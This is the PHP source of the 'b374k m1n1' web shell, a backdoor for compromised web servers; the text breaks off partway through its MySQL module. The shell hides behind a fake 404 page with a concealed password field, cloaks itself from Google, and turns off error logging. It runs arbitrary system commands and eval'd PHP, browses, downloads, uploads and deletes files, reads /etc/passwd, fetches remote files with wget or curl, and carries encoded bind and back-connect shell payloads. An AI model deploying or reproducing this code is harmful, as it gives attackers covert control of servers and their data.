<?

$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes
($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @fi
le_get_contents($file); header("Content-type: application/octet-stream"); header
("Content-length: ".strlen($filez)); header("Content-disposition: attachment; fi
lename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgz
ip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@f
ile_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("C
ontent-length: ".strlen($filez)); header("Content-disposition: attachment; filen
ame=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){
@ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesiz
e($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-t
ype: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date
("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7));
@readfile($d.$f); exit; } $ver = "james0baster"; $software = getenv("SERVER_SOFT
WARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

$safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(

substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y
'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $p
wd = $_GET['y']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami")))
$user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd =
@getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $use
r; $prompt = $user." &gt;"; $pwd = realpath(".")."\\"; $v = explode("\\",$d); $v
= $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\");
if ($bool) { $letters .= "<a href=\"?y=".$letter.":\\\">[ "; if ($letter.":" !=
$v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</
span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && fu
nction_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip
= @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $bind
port = "55555"; $bindport_pass = "james0baster"; $pwds = explode(DIRECTORY_SEPAR
ATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""
; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwd
url .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; }
if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']
; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />";
$buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "serve
r ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />";
if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />"; else $b
uff .= "safemode <span class=\"gaya\">OFF<span><br />"; $buff .= $letters."&nbsp
;&gt;&nbsp;".$pwdurl; function rapih($text){ return trim(str_replace("<br />",""
,$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $te
xt; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = arr
ay(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists(
"posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($
dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] =
$file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fn
ame); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof(
$path); $parent = ""; $buff = " <form action=\"?y=".$pwd."&amp;x=shell\" method=
\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;
\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" clas
s=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><inp
ut class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\
"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"ma
rgin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><
td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" cla
ss=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd.
"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd
\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <
tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">ow
ner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">mod
ified</th><th style=\"width:190px;\">actions</th></tr> "; if($tree > 2) for($i=0
;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd;
foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@po
six_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else
{ $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><t
d>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)
."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</
td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newf
ile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></s
pan> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" sty
le=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\"
/> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\"
value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rena
me\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> "; } elseif($fold
er == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $

group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=

\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><t
d><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align
:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:
center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\">
<a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"java
script:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\"
method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;
\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"input
z\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /
> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;
\" value=\"Go !\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@p
osix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else
{ $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" hr
ef=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y
=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" s
tyle=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".
$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"wid
th:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class
=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=
\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('
".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>
DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$fo
lder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($fold
er))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clea
rspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$f
older."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$fil
e; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_
getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </s
pan>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".cle
arspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a> <form action=\
"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\"
style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\""
.$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"widt
h:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"
inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"i
nputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".c
learspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".
ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_pe
rms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime(
$full))."</td> <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javas
cript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename
</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;d
l=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td>
</tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size
= @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024
) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round(
$size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function e
xe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @o
b_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec'
)) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $r
esult; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @pas
sthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif
(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } fu
nction tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez =
@fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil(
$link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($
fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose
($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { r

eturn trim($path); } else { return trim($pr); } } function download($cmd,$url){

$namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$
url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url."
> ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch
' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(
which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which(
'GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$ur
l." -o ".$namafile);break; default: break; } return $namafile; } function get_pe
rms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ?
'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? '
x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w'
: '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' :
'-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '
-'; return $perms; } else return "??????????"; } function clearspace($text){ ret
urn str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aY
xJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6
BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvm
yNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07
vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn
7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9Lgpk
Q7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJ
G07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+Mhc
FqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQ
ZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $
port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfi
td33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1
yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8
SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WM
ouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrV
o vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +
hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/s
PWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKs
gn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6f
LdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7E
obN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/e
xUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/Id
hhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7
R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAY
pup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xv
RDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW
43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvE
mHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwd
HcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::
</title> <script type="text/javascript"> function tukar(lama,baru){ document.get
ElementById(lama).style.display = 'none'; document.getElementById(baru).style.di
splay = 'block'; } </script> <style type="text/css"> body{ background:#000000;;
} a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ fon
t-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ backgroun
d:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; backgr
ound:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ backgro
und:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .t
abnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%;
} .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px;
border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ ba
ckground:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inpu
tz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px soli
d #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height
:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{
padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-siz
e:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0

; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100

%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6p
x 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333;
font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:1
6px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore
{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:
1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8
px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1
px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ backgrou
nd:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:non
e; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(
'cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="h
ead_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class=
"b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $
ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div
> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?ph
p echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell
">shell</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a> <a href="?<?p
hp echo "y=".$pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&
amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">n
etsploit</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">upload</a> <a href
="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a> <a href="?<?php echo "y=".$pwd;
?>&amp;x=brute">BruteForce</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=readabl
e">Readable</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">DOS</a> <a href="h
ttp://james0baster.web.id/" target="_blank">james0baster</a> </div> <!-- menu en
d --> <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=
<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td> <t
extarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd']))
{ echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/et
c/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut"
type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form
> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['
sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET[
'sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass
= $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlh
ost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4p
x 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@<
/span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</
span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;
sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[
databases ]</a>"; if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya
\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlh
ost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."
&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET
['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a
href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser.
"&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;t
able=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</
p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con
)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['t
able'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABL
E IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL
);\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k
_table;\nDROP TABLE IF EXISTS b374k_table;"; $msg = "<div style=\"width:99%;padd
ing:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y
\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <i
nput type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hi
dden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"
sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" valu
e=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p

><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$

query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"
submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = a
rray(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available
tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list
($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tabl
es); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=my
sql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&a
mp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></t
r>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlq
uery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM "
.$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;
\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"
".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\
"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name
=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" v
alue=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlp
ass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\
"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\"
class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><
input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"subm
it\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table c
lass=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM
".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<t
h>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SEL
ECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(
isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $to
tpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @my
sql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while(
$datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</t
r>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form
action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\
" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\"
name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluse
r\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".
$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /
> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\"
name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\"
onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "
<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<optio
n value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select>
<noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript
></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) &
& ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlqu
ery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" meth
od=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=
\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\"
value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sq
luser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <
input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"h
idden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"
output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input cl
ass=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" val
ue=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";"
,$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_que
ry($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">"
